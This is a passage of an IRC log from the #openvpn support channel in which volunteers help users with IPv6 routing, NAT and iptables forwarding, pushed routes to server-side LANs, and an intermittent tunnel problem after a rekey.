swiftkey> thanks ngharo 19:32 < WhoNeedszzz> ngharo, wb 19:32 < ngharo> swiftkey: thats not what your logs say 19:33 < swiftkey> yes my bad 19:33 < swiftkey> thanks for the eyespot 19:33 < swiftkey> erm im new to this thanks for you help :) 19:34 < ngharo> WhoNeedszzz: can you even ping out to ipv6.google.com from your server right now 19:34 < rabidsnail> I'm trying to set up openvpn to only proxy traffic for applications that explicitly want to. I'm trying starting openvpn with no routes (--route-noexec) and explicitly binding to the tun interface, but clients seem to block forever. 19:35 < ngharo> which IPv6 address is valid, you have two that I see 19:35 < rabidsnail> eg: curl --interface tun0 'http://www.ipchicken.com' 19:35 < swiftkey> how to fix NAT ? 19:35 < swiftkey> i guess this is avery lame question 19:35 < swiftkey> but i need to hehe 19:36 < ngharo> see above for an iptables example 19:36 < swiftkey> i turned off iptables 19:36 < ngharo> well you need something to NAT, like iptables 19:37 < WhoNeedszzz> ngharo, yeah i can 19:37 < WhoNeedszzz> ngharo, what should the npd6 prefix be now? 19:37 < swiftkey> let me check again 19:38 < ngharo> WhoNeedszzz: well you said you've been assigned 2600:3c00:e000:0016::/64 19:38 < ngharo> yet i dont see any address configured with that 19:38 < ngharo> so im confused 19:38 < WhoNeedszzz> what do you mean? 19:39 < WhoNeedszzz> It's configured to tun0 19:39 < WhoNeedszzz> it's there what i pasted 19:39 < ngharo> eth0 isnt configured under that subnet 19:39 < swiftkey> im able to chat still but unable to surf 19:39 < swiftkey> i guess its a NAT problem then 19:39 < WhoNeedszzz> it's routed to my other ipv6 address 19:40 < WhoNeedszzz> do i need to also add it to eth0? 19:40 < ngharo> i would 19:40 < ngharo> set npd prefix to 2600:3c00:e000:0016: 19:41 < ngharo> and server-ipv6 in config to server-ipv6 2600:3c00:e000:0016::f/112 19:41 < WhoNeedszzz> ah ok 19:45 -!- b1rkh0ff [~b1rkh0ff@178.77.8.47] has quit [Ping timeout: 255 seconds] 19:45 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has quit [Read error: Connection reset by peer] 19:46 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 19:46 < WhoNeedszzz> still no go 19:47 < WhoNeedszzz> does it have anything to do with the MULTI: Bad source address...blah...blah have to do with it? 19:47 < WhoNeedszzz> wow sentence fail 19:48 < WhoNeedszzz> ngharo, 19:48 < ngharo> paste client log, ip -6 a, and ip -6 r 19:49 -!- raidz is now known as raidz_away 19:49 < ngharo> also do you still have ipv6 forwarding enabled 19:49 < ngharo> and proxy_npd 19:49 < ngharo> net.ipv6.conf.all.forwarding=1 19:49 < ngharo> net.ipv6.conf.all.proxy_ndp=1 19:50 < ngharo> (server) 19:53 < WhoNeedszzz> ngharo, https://gist.github.com/f413909536d3a3fdce76 19:53 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has quit [Remote host closed the connection] 19:53 <@vpnHelper> Title: gist:f413909536d3a3fdce76 (at gist.github.com) 19:54 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 19:54 < WhoNeedszzz> ngharo, https://gist.github.com/f413909536d3a3fdce76 19:54 <@vpnHelper> Title: gist:f413909536d3a3fdce76 (at gist.github.com) 19:54 < WhoNeedszzz> and yes those sysctl settings are correct 19:56 < ngharo> and npd has the right prefix and was restarted 19:56 < WhoNeedszzz> yes 19:56 -!- b1rkh0ff [~b1rkh0ff@178.77.8.47] has joined #openvpn 19:56 < ngharo> you can ping ip6 client<->server? 19:56 < WhoNeedszzz> yes 19:56 < WhoNeedszzz> both ways 19:57 < WhoNeedszzz> ah wait 19:57 < WhoNeedszzz> the prefix isn't right 19:57 < WhoNeedszzz> i have :16 instead of :0016 19:58 < ngharo> you can omit leading zeros 19:58 < ngharo> should be fine 19:58 < ngharo> tcpdump -i eth0 ip6 19:59 < ngharo> then do ping6 2001:1af8:4400:a049:: from client 19:59 < ngharo> do you see the traffic leaving eth0? 20:00 -!- savagecroc [~grahamsav@207.204.241.202] has quit [Ping timeout: 260 seconds] 20:02 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has quit [Read error: Connection reset by peer] 20:05 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 20:05 -!- CrashTM [~CrashTM@cpe-98-144-34-109.wi.res.rr.com] has joined #openvpn 20:05 < WhoNeedszzz> ngharo, the ping6 command you gave gives: "ping6: Source routing is deprecated by RFC5095." 20:05 < CrashTM> how might i forward a port through my openvpn server to the client 20:06 < WhoNeedszzz> but i pinged the server vpn ipv6 address and didn't get any unknown solicitations 20:07 < WhoNeedszzz> it's hard to see what's going on in the dump because i have an ipv6 named server active 20:08 < ngharo> CrashTM: treat it like any other LAN interface 20:08 < CrashTM> >.> 20:08 < ngharo> also, where in WI :) 20:09 < ngharo> i'm just north of Milwaukee 20:09 < CrashTM> the mil 20:09 < ngharo> cool 20:09 < ngharo> I do a security meeting every month on 5th and national 20:09 < CrashTM> cool 20:10 < ngharo> dc414, check it out if you're interested 20:10 < CrashTM> mind giving more info on how i might do that 20:10 < WhoNeedszzz> ngharo, so what am i looking for in the tcpdump? 20:11 < ngharo> WhoNeedszzz: filter by 'icmp6' instead of just 'ip6' then 20:11 < ngharo> well 20:11 -!- gardar [~gardar@gardar.net] has quit [Quit: bye!] 20:11 < ngharo> i'm not sure why ping6 returns that 20:11 < WhoNeedszzz> can i filter out the port? 20:11 < ngharo> i still say assign 2600:3c00:e000:0016::/64 to eth0 20:11 < ngharo> and remove the others 20:11 < ngharo> and make sure you can ping6 google after that 20:12 < ngharo> then try vpn again 20:12 < WhoNeedszzz> well since the /64 is routed to the existing one, won't that screw things up? 20:12 < ngharo> i dunno, i'm too dumb to know that 20:12 < ngharo> CrashTM: http://serverfault.com/questions/140622/how-can-i-port-forward-with-iptables 20:12 <@vpnHelper> Title: linux - How can I port forward with iptables? - Server Fault (at serverfault.com) 20:13 < ngharo> CrashTM: you can assign static IPs to client with ccd entries 20:13 < ngharo> !ccd 20:13 <@vpnHelper> "ccd" is (#1) entries that are basically included into server.conf, but only for the specified client based on common-name. use --client-config-dir to enable it, then put the config options for the client in /common-name or (#2) the ccd file is parsed each time the client connects. 20:13 -!- gardar [~gardar@gardar.net] has joined #openvpn 20:14 < ngharo> WhoNeedszzz: maybe just assign that address in addition to what you have now 20:18 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has quit [Quit: Leaving] 20:19 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 20:19 -!- Castorrr [Castor_@CPE-72-133-200-232.wi.res.rr.com] has joined #openvpn 20:19 < WhoNeedszzz> ngharo, hmm nothing is coming up in tcpdump when i ping it 20:20 < WhoNeedszzz> other than IP6 fe80::ca4c:75ff:fef5:c4ff > whirlpool: ICMP6, neighbor solicitation, who has whirlpool, length 32 20:20 < WhoNeedszzz> and i'm constantly getting pinged by 2001:1af8:4400:a049::100f 20:20 < ngharo> yea thats me trying to hit your client 20:21 < WhoNeedszzz> ok 20:21 < WhoNeedszzz> thought so 20:21 < ngharo> so thats good you're receiving it 20:21 < ngharo> but the tun0<->eth0 is busted 20:21 < WhoNeedszzz> also getting IP6 whirlpool > fe80::1: ICMP6, neighbor solicitation, who has fe80::1, length 32 20:21 < ngharo> is it your god damned firewall again? :) 20:22 < WhoNeedszzz> haven't touched the fw 20:22 < ngharo> do you log drops? 20:22 < ngharo> check to make sure 20:22 < WhoNeedszzz> before i just had a typo of icmpv6-type 8 when it should have been 128 20:22 < WhoNeedszzz> how to check that? 20:23 < ngharo> it's your firewall man :) 20:23 < ngharo> syslog? 20:23 < WhoNeedszzz> i'm getting request and reply from you 20:24 < ngharo> yeah to ::10 works 20:24 < ngharo> ::100f does not reply 20:24 < WhoNeedszzz> i use systemd so i guess journalctl 20:24 < WhoNeedszzz> well it's down now 20:24 < WhoNeedszzz> i can be on irc while it's on 20:24 < WhoNeedszzz> it makes my whole connection screw up 20:24 < WhoNeedszzz> can't* 20:25 < ngharo> you could comment the ipv4 redirect gateway 20:25 < ngharo> probably whats doing it 20:25 < ngharo> while testing 20:27 < WhoNeedszzz> ok yeah now it's not destroying my connection 20:27 < WhoNeedszzz> it's live now 20:27 < WhoNeedszzz> but can you still reach me when i'm not redirecting? 20:28 < CrashTM> ngharo 20:28 < CrashTM> hmm 20:28 < ngharo> that line has nothing to dowith ipv6 20:28 < CrashTM> seems like it is not working 20:29 < WhoNeedszzz> so i should be able to ping6 ipv6.google.com when that is commented? 20:29 < ngharo> WhoNeedszzz: yes idealy 20:29 < WhoNeedszzz> i thought that was the whole point was that i need to redirect to get access 20:29 < WhoNeedszzz> i don't have ipv6 here 20:30 < ngharo> the 2000::/3 is your ipv6 "default" route 20:30 < ngharo> redirect-gateway is ipv4 20:32 < WhoNeedszzz> oh 20:32 < ngharo> WhoNeedszzz: canyou ping6 2600:3c00::21:7d0c from your client? 20:32 < WhoNeedszzz> lol 20:32 < WhoNeedszzz> yeah 20:32 < WhoNeedszzz> is ipv6.google.com down? 20:33 < ngharo> lol no 20:33 < ngharo> WhoNeedszzz: but ping6 ngha.ro throws that source routing error? 20:34 < WhoNeedszzz> no now it just hangs 20:34 < ngharo> same with 2001:1af8:4400:a049:: 20:34 < ngharo> ? 20:35 < WhoNeedszzz> yeah 20:35 < WhoNeedszzz> no error now 20:35 < WhoNeedszzz> just hangs 20:36 < ngharo> yeah i dunno 20:36 < ngharo> gather your details and ask in #ipv6 20:36 < ngharo> you can ping across the vpn 20:36 < ngharo> the problem is outside openvpn 20:37 < ngharo> CrashTM: google iptables port forwarding gives you hundreds of examples, take your pick 20:37 < WhoNeedszzz> when pinging you and running tcpdump i just get: "IP6 whirlpool > fe80::1: ICMP6, neighbor solicitation, who has fe80::1, length 32" 20:39 < ngharo> fe80::1 is your gateway? 20:39 < WhoNeedszzz> yes 20:40 < WhoNeedszzz> here is tcpdump running for a while: https://gist.github.com/9ebf0c6793d3c6fa3c8d 20:40 <@vpnHelper> Title: gist:9ebf0c6793d3c6fa3c8d (at gist.github.com) 20:45 < WhoNeedszzz> ngharo,? 20:48 -!- corretico [~luis@190.211.93.38] has quit [Ping timeout: 272 seconds] 20:48 < WhoNeedszzz> ngharo, are you sure it's not related to me seeing this?: MULTI: bad source address from client [192.168.1.9], packet dropped 20:50 < WhoNeedszzz> nvm i'm not actually getting that anymore 20:52 < WhoNeedszzz> according to linode it is my firewall 20:52 < WhoNeedszzz> they say the FORWARD chain needs to be ACCEPT or have rules to forward between eth0 and tun0 20:53 -!- corretico [~luis@190.211.93.38] has joined #openvpn 20:54 -!- corretico [~luis@190.211.93.38] has quit [Max SendQ exceeded] 20:55 < WhoNeedszzz> yep that's it alright 20:55 < WhoNeedszzz> hmm odd i don't remember allowing it to be accept before 20:55 -!- corretico [~luis@190.211.93.38] has joined #openvpn 20:56 < WhoNeedszzz> and ok so if that works without the redirect-gateway what is the benefit of that? 20:57 -!- corretico [~luis@190.211.93.38] has quit [Max SendQ exceeded] 20:57 < ngharo> ip4 traffic 20:57 -!- corretico [~luis@190.211.93.38] has joined #openvpn 20:57 < WhoNeedszzz> why would you want to route ip4 traffic? 20:58 < WhoNeedszzz> for encrypting traffic? 20:58 < ngharo> to your server, yes 20:59 < WhoNeedszzz> You paranoid? :p 20:59 < WhoNeedszzz> What would be the benefit of that? 21:02 < ngharo> for me my traffic is encrypted until it goes overseas 21:02 < ngharo> which I like 21:02 -!- zz_AsadH is now known as AsadH 21:03 -!- AsadH [~AsadH@unaffiliated/asadh] has left #openvpn [] 21:04 -!- crazyhorse [~grahamsav@207.204.241.202] has joined #openvpn 21:04 < crazyhorse> any idea how i can push all traffic from a particular application over normal internet and not the VPN? 21:05 < ngharo> do you know the host the application contacts? 21:06 < crazyhorse> nah it's random hosts 21:06 < crazyhorse> utorrent 21:06 < crazyhorse> utorrent supports socks/http proxy 21:06 < crazyhorse> but i don't know if that helps 21:07 < WhoNeedszzz> ngharo, why does it not stay encrypted? 21:07 < crazyhorse> vpn has limited bandwidth 21:07 < crazyhorse> so i just want to run it over the normal internets 21:08 < ngharo> WhoNeedszzz: it gets decrypted once it reaches my server 21:08 < ngharo> WhoNeedszzz: as does your ipv6 traffic now 21:09 < WhoNeedszzz> anyway i can make it stay encrypted? 21:09 < ngharo> no, the public internet doesnt know how to decrypt your stream 21:10 < ngharo> that would defeat the purpose 21:10 < WhoNeedszzz> right ok 21:11 < WhoNeedszzz> so currently if someone were snooping on my traffic they can't see my ipv6 traffic, correct? 21:11 < WhoNeedszzz> snooping on the client 21:11 < ngharo> they cant see anything between client and server 21:11 < ngharo> except a bunch of garbage 21:11 < WhoNeedszzz> So if i redirect my ipv4 traffic my ISP can't snoop on me, right? 21:11 < ngharo> correct 21:12 < WhoNeedszzz> great 21:12 < WhoNeedszzz> i'll re-enable that then 21:12 < ngharo> your server's ISP still can though 21:12 < WhoNeedszzz> right 21:12 < WhoNeedszzz> they won't though 21:12 < ngharo> of course they wont :) 21:12 < WhoNeedszzz> i'm just trying to make my torrenting traffic encrypted :) 21:13 < ngharo> if ya got a server, why not torrent there? 21:13 < WhoNeedszzz> i tried just using encryption in the torrent client, but a lot of people can't be reached when i do that 21:13 < ngharo> rtorrent + rutorrent client = win 21:13 < WhoNeedszzz> then i would have to download to my server then upload to my client 21:13 < WhoNeedszzz> that would use my bandwidth 21:13 < WhoNeedszzz> i run a Tier 2 DNS server 21:14 < WhoNeedszzz> already get a lot of traffic 21:14 -!- crazyhorse [~grahamsav@207.204.241.202] has quit [Ping timeout: 255 seconds] 21:14 < ngharo> you're still using the same traffic doing it from client 21:14 < ngharo> but whatevs, either or 21:14 < WhoNeedszzz> oh ha you're right 21:14 < ngharo> i just prefer to do it on server for 100mbit action 21:14 < WhoNeedszzz> didn't think about it that way 21:20 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has quit [Disconnected by services] 21:21 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 21:21 < WhoNeedszzz> hmm restarting the vpn messes up my irc connection 21:21 < WhoNeedszzz> but at least it's working now 21:21 < WhoNeedszzz> Thanks for the help 21:58 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has left #openvpn ["Leaving"] 22:32 -!- rabidsnail [~rabidsnai@unaffiliated/cmdrbatguano] has quit [Quit: rabidsnail] 22:35 -!- blackness [black@2001:470:8cf8::9] has quit [Read error: Connection reset by peer] 22:45 -!- elc0 [~andy@c-71-205-251-207.hsd1.mi.comcast.net] has joined #openvpn 22:45 -!- HyperGlide [~HyperGlid@182.149.53.195] has quit [Remote host closed the connection] 22:46 < elc0> !welcome 22:46 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum !wiki 22:46 <@vpnHelper> !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 22:46 < elc0> !ip forward 22:48 < elc0> !nat 22:48 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) dont forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto 22:53 -!- zeeshoem [~zee@198-84-231-11.cpe.teksavvy.com] has quit [] 22:54 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 22:58 -!- elc0 [~andy@c-71-205-251-207.hsd1.mi.comcast.net] has quit [Ping timeout: 245 seconds] 23:14 -!- bigmeow [~mirror@184.82.217.174] has quit [Ping timeout: 276 seconds] 23:15 -!- bigmeow [~mirror@184.82.217.174] has joined #openvpn 23:52 < mnathani> How can I use the windows openvpn client with my opensource / (Non-Access Server version of Openvpn) Not sure how to create an openvpn profile --- Day changed Tue Jan 15 2013 00:08 -!- CrashTM [~CrashTM@cpe-98-144-34-109.wi.res.rr.com] has quit [Quit: Leaving] 00:15 < ngharo> !sample 00:15 <@vpnHelper> "sample" is (#1) http://www.ircpimps.org/openvpn.configs for a working sample config or (#2) DO NOT use these configs until you understand the commands in them, read up on each first column of the configs in the manpage (see !man) or (#3) these configs are for a basic multi-user vpn, which you can then build upon to add lans or internet redirecting 00:15 < ngharo> start there, name it .ovpn and go 00:16 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 248 seconds] 00:32 < mnathani> Thanks ngharo 00:38 -!- swat [~swat@ubuntu/member/swat] has joined #openvpn 01:19 <+pekster> dazo_afk: Okay, that was the info I needed. Maybe 2.3.0 wasn't built with this commit then? Because the installation leaves out the utility scripts by default unless a user manually re-installs the tap-windows.exe with the utilities selected. https://github.com/OpenVPN/openvpn-build/commit/95df0695e2106c17dcbb55b661c5669b953b1a6c 01:19 <@vpnHelper> Title: windows-nsis: install tap utilities · 95df069 · OpenVPN/openvpn-build · GitHub (at github.com) 01:24 <+pekster> Oh, I think I found the problem (the installer section isn't named the same in the tap-windows project as it is in openvpn-build's nsis script. I'll verify the cause and send in a patch to correct 01:29 <+pekster> Or, too soon; there's macro magic that's supposed to make it work. I guess I'll dig further to see if the build lacks the right commits from master and see what I find 01:41 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 01:55 -!- Orbi [~opera@109.129.15.71] has joined #openvpn 01:57 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 02:00 -!- Orbi [~opera@109.129.15.71] has quit [Ping timeout: 245 seconds] 02:03 -!- Orbi [~opera@anon-149-134.vpn.ipredator.se] has joined #openvpn 02:09 -!- Orbi [~opera@anon-149-134.vpn.ipredator.se] has quit [Ping timeout: 245 seconds] 02:14 -!- oskie_ is now known as oskie 02:16 -!- Orbi [~opera@anon-185-43.vpn.ipredator.se] has joined #openvpn 02:21 -!- Azrael808 [~peter@212.161.9.162] has quit [Quit: Ex-Chat] 02:31 < Orbi> I removed "writepid /var/run/openvpncl.pid" from the config and the errors "Initialization Sequence Completed": write UDPv4 [EMSGSIZE Path-MTU=1492]: Message too long (code=97)" dissapeared 02:31 < Orbi> Somebody understand the link if there is one? 02:44 -!- blackness [black@2001:470:8cf8::9] has joined #openvpn 02:44 < blackness> !openvz 02:44 <@vpnHelper> "openvz" is (#1) http://wiki.openvz.org/VPN_via_the_TUN/TAP_device to learn bout openvz specific stuff with regards to openvpn or (#2) It is usually less painful to switch to a host with better virtualization technology, eg Xen. 03:01 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 03:06 -!- NChief [tomme@unaffiliated/nchief] has quit [Ping timeout: 264 seconds] 03:08 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 03:30 -!- blackness [black@2001:470:8cf8::9] has quit [Ping timeout: 252 seconds] 03:40 -!- brute11k [~brute11k@89.249.235.236] has joined #openvpn 03:49 -!- a_ [~d@64.111.123.163] has quit [Quit: Reconnecting] 03:49 -!- catsup [~d@64.111.123.163] has joined #openvpn 03:54 -!- d12fk [~heiko@exit0.net] has joined #openvpn 04:06 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 04:06 -!- Azrael808 [~peter@212.161.9.162] has quit [Client Quit] 04:08 -!- Orbi [~opera@anon-185-43.vpn.ipredator.se] has quit [Read error: Connection reset by peer] 04:08 -!- Orbi [~opera@anon-185-43.vpn.ipredator.se] has joined #openvpn 04:25 -!- Orbi [~opera@anon-185-43.vpn.ipredator.se] has quit [Ping timeout: 245 seconds] 04:27 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn 04:28 < fu_fu> morning 04:31 < fu_fu> got a problem: after several hours of use the tunnel seems to go half-down. ping from the server does not return, ping from the client returns normally. when i reload the service on client, pings resume normally. (Windows to windows) 04:31 < fu_fu> the problem last occurred after the hourly rekey 04:33 <+pekster> Sounds like a firewall problem on the client. You're talking about an ICMP ping, right? Not OpenVPN's control-channel --ping option? 04:34 < fu_fu> yes correct, ping is just the symptom, other data does not flow also 04:34 < fu_fu> how does a firewall issue behave intermittently? 04:34 <+pekster> The reply ping is itself tunneled data. The fact that you get a reply means the tunnel is working 04:34 < fu_fu> only one way 04:35 <+pekster> No, both ways, otherwise you wouldn't get the ICMP echo-response 04:35 < fu_fu> ok, so only from one source then 04:35 < fu_fu> the server >client does not function after hours of use 04:35 < fu_fu> ceases to function 04:36 <+pekster> Sorry, that's pattently incorrect. How do you think the "ping" gets back to the client? 04:36 <+pekster> tcpdump the tun interface on the client if you don't believe me 04:36 <+pekster> You'll see an ICMP echo-request packet go from client -> server, then a reply ICMP echo-reply packet from server -> client 04:37 <+pekster> If you don't see that, then you wouldn't get a response in your command window on the ping 04:37 < fu_fu> ok, why wont ping work until i restart the service 04:37 <+pekster> You just said it did work when initiated from the client, right? 04:37 < fu_fu> yes, not from the server thus half-down 04:38 <+pekster> You're not getting it. This isn't an openvpn problem, becuase the tunnel isn't what's "half down" 04:38 <+pekster> The tunnel is working just fine since the reply traaffic comes *back* to the client. Do you understand why this demonstrates that the server can reach the client across the VPN tunnel? 04:39 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Read error: Connection timed out] 04:39 <+pekster> If you want, increase the verbosity of both client & server to 'verb 5' in the ovpn configuration and see if anything odd appears when this happens. Otherwise, look at your OS-level configuration to fix the reason your server apparently replies selectively in a way you don't like 04:40 < fu_fu> i have verb level 5 set 04:40 <+pekster> The server has to *SEND* the ICMP echo-reply packet 04:40 <+pekster> You see? That pakcet *does* get back to the client. It's just a normal IP packet like any other IP traffic 04:40 < fu_fu> there is no rw after the rekey 04:41 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn 04:42 < fu_fu> so why doesnt the log reflect the client origin pings? 04:47 <+pekster> No clue. When I use verb5 and ping across thee tunnel, I get this in my server logs: 04:47 <+pekster> WRwrWRwr 04:47 < fu_fu> me too, until the problem happens 04:47 <+pekster> But you're getting replies? 04:47 <+pekster> Specifically, something like this: 04:47 <+pekster> Pinging 10.123.123.1 from 10.123.123.100 with 32 bytes of data: 04:47 <+pekster> Reply from 10.123.123.1: bytes=32 time=3ms TTL=128 04:48 <+pekster> If you get a reply, the traffic is coming back to you (obviously.) You can't say you're not getting traffic across the tunnel when you have evidence that you are 04:48 -!- genghi1 [~Adium@p5089BF98.dip.t-dialin.net] has joined #openvpn 04:52 < fu_fu> i am only getting replies form one side, and oly after several hours of proper operation 04:53 -!- Minnebo [~Minnebo@office.exabyte.be] has joined #openvpn 04:53 < Minnebo> Hello, i'm openvpn noob! 04:53 < Minnebo> I managed to get it working 04:54 < fu_fu> the client log shows no rw after the rekey 04:54 < Minnebo> I can ping to my server, but i cannot access files 04:58 <+pekster> fu_fu: Can you post your server config file? Maybe you're specifying some option that re-runs on a rekey that's causing you issues; I doubt it, but I can take a glance anyway 04:59 -!- blackness- [black@199.175.53.115] has joined #openvpn 04:59 < blackness-> Is it possible to listen :113 on a OpenVPN HOST and OpenVPN client? 04:59 < Minnebo> I can access it thourgh its 10.0.8.1 adress 04:59 < Minnebo> :w 05:00 < fu_fu> ok 05:00 <+pekster> Minnebo: ping the VPN endpoint? Then how are you trying to access files? Use the VPN IP to reach that server, unless you're also pushing additional routes 05:00 < blackness-> Like, The OpenVPN client has working ident, and the OpenVPN HOST has working ident. 05:01 < Minnebo> pekster, well I can ping to the server on 192.168.100.1 but when I do \\192.168.100.1 it says no access. When i go \\10.0.8.1 is see all the shares. What do I need to configure to get \\192.168.100.1 working? 05:04 <+pekster> holmen: I'm going to bring the conversation back here since, at least for now, I don't need to reference your configs anymore that you don't want shared. Since you have multiple routing tables, you somehow need to add the route for the VPN peer to go out via tap0 05:04 <+pekster> holmen: You might just need to specify a /32 route using the $route_vpn_gateway and $ifconfig_local options, since you really just need a route to the $route_vpn_gateway for your two /1 routes to work (rememger, those are there eto emulate the behaviour of 'redirect-gateway' as required for your 2nd routing table 05:05 <+pekster> Minnebo: The VPN server is alive at both those IPs? 05:05 < Minnebo> yes 05:05 <+pekster> Are you pushing a route for that IP then across the VPN tunnel? Otherwise, maybe that IP is just responding from something else on the client's local network 05:05 < Minnebo> The vpn server runs on the 192.168.100.1 05:06 < Minnebo> and the 10.0.8.1 is the virtual ip 05:06 < Minnebo> our local network is 111 05:06 < Minnebo> but you might be correct 05:07 < Minnebo> i might just change these virtual ip's 05:07 < Minnebo> and give this dhcp 5 adresses 05:07 < Minnebo> then I wont have the problem 05:08 -!- Orbi [~opera@anon-186-110.vpn.ipredator.se] has joined #openvpn 05:08 <+pekster> Minnebo: TO access a LAN address like that, you need to push a route to it to the VPN client 05:08 <+pekster> Otherwise the client has no way to know that traffic for 192.168.100.x is supposed to go across the tunnel 05:08 <+pekster> Have you pushed such a route? 05:09 < Minnebo> no 05:09 < Minnebo> its default 05:09 <+pekster> Then this is why it doesn't wnork 05:09 < Minnebo> config 05:09 <+pekster> It's just chanace that you get a reply from some "other" 192.168.100.1 on your client's upstream netwnork 05:09 < Minnebo> k 05:09 < Minnebo> how does the push thing look like? 05:10 < Minnebo> push "route 192.168.100.0 255.255.255.0" 05:10 < Minnebo> ? 05:10 <+pekster> Yup 05:10 < blackness-> Yep. 05:10 < Minnebo> k 05:10 <+pekster> The client will send that to the client and the client will get a route added on connect that sends traffic for that netework via the VPN server 05:10 < blackness-> thanks again pekster for all your help. :) 05:10 <+pekster> The server will send* 05:11 <+pekster> Sure 05:11 < blackness-> Feel like helping me with my little problem? 05:11 <+pekster> You can't have "both" servers respond to a port, no 05:12 <+pekster> When you deal with private addresses, your internal LAN doesn't actually exist according to the Internet 05:12 <+pekster> A port is a port. You can't subdivide it further 05:13 < blackness-> what about having it triggered by source_address and respond back to that source? 05:13 < blackness-> just curious is all.. 05:13 < fu_fu> afk 05:14 < Minnebo> 192.168.100.0 255.255.255.0 10.8.0.5 10.8.0.6 30 I see this in my route print but still no go, perhaps a firewall rule? 05:15 < Minnebo> and can't ping anymore :D 05:15 <+pekster> blackness-: huh? How do you expect to know "which" private host an external client wants to send a packet for based on its source address? 05:15 <+pekster> THat doesn't even make any sense 05:16 < fu_fu> bk 05:16 <+pekster> Minnebo: It could be; that depends on how your firewall is set up 05:16 <+pekster> See the note in the /topic (often people's probelms are caused by firewalls 05:16 < Minnebo> ty 05:17 < Minnebo> !welcome 05:17 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 05:17 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 05:17 <+pekster> Remember to look at it knowing that the source IP will be the VPN address and the destination IP will be 192.168.100.1 05:17 <+pekster> Also, if you're exposing the entire server-side LAN like that, also see: 05:18 <+pekster> !serverlan 05:18 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 05:18 <+pekster> The route you pushed is a whole /24, not just a single host 05:18 < Minnebo> yes 05:18 < Minnebo> indeed 05:18 < Minnebo> i'll fix it and relog 05:18 <+pekster> Well, that won't cause a problem getting to that host, just if you wnated to reach other hosts in the /24 05:19 <+pekster> Chances are good it's a firewall issue if you have that route and it's still not working 05:22 < Minnebo> pekster, i think the problem is 05:22 < blackness-> if i set a var of IPs, how should it be? 0.0.0.0,1.1.1.1 ? 05:22 < Minnebo> that the server doenst know a route back? 05:23 <+pekster> fu_fu: I see nothing in that setup that would cause issues on re-keying or similar. The 'keepalive' directive gaurentees that the encapsulating tunnel is still running or that the peer will reconnect, and your ICMP ping from client -> server shows that bi-directional traaffic is flowing and being routed as expected 05:23 <+pekster> Your problem is simply not openvpn 05:23 <+pekster> blackness-: huh? I need some context here 05:23 < blackness-> i'll be using the var like this: iptables -A INPUT -i eth0 -p tcp -s $IPLIST --dport 2222 -j ACCEPT 05:24 <+pekster> Use ipset for that, or write unique rules for each IP (optionally put them them in your own user-defined chain to minimize processing time) 05:24 < blackness-> so a loop would be required if i did a ruleset per IP correct? 05:24 <+pekster> loop? 05:24 < blackness-> im not good enough to use ipset at this point 05:25 < blackness-> yeah, for i in $IPLIST; do ipfilter rule here; done 05:25 < blackness-> which that loop would replace the single --dport 2222 line ofc. 05:25 <+pekster> If you'd like, sure. I don't apply my rules like that and use iptables-restore to load my rules 05:26 < blackness-> welp, time to get to writing a loop :) 05:26 <+pekster> fu_fu: I don't mind keeping your private configuration in a PM, but don't ask me questions there. I'm not your personal paid support, and this channel has other people who can help, and may see something I don't. Plus I don't like answering questions in private that don't have a chance to benefit other people 05:27 <+pekster> !topsecret 05:27 <@vpnHelper> "topsecret" is if your setup is so top secret that you cant post your configs or logs, please leave now and go find support you trust. 05:27 < Minnebo> !route 05:27 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 05:28 < Minnebo> !tcpip 05:28 <+pekster> Really your config has nothing to identify you beyond your commented out local IP anyway (and you can just remove 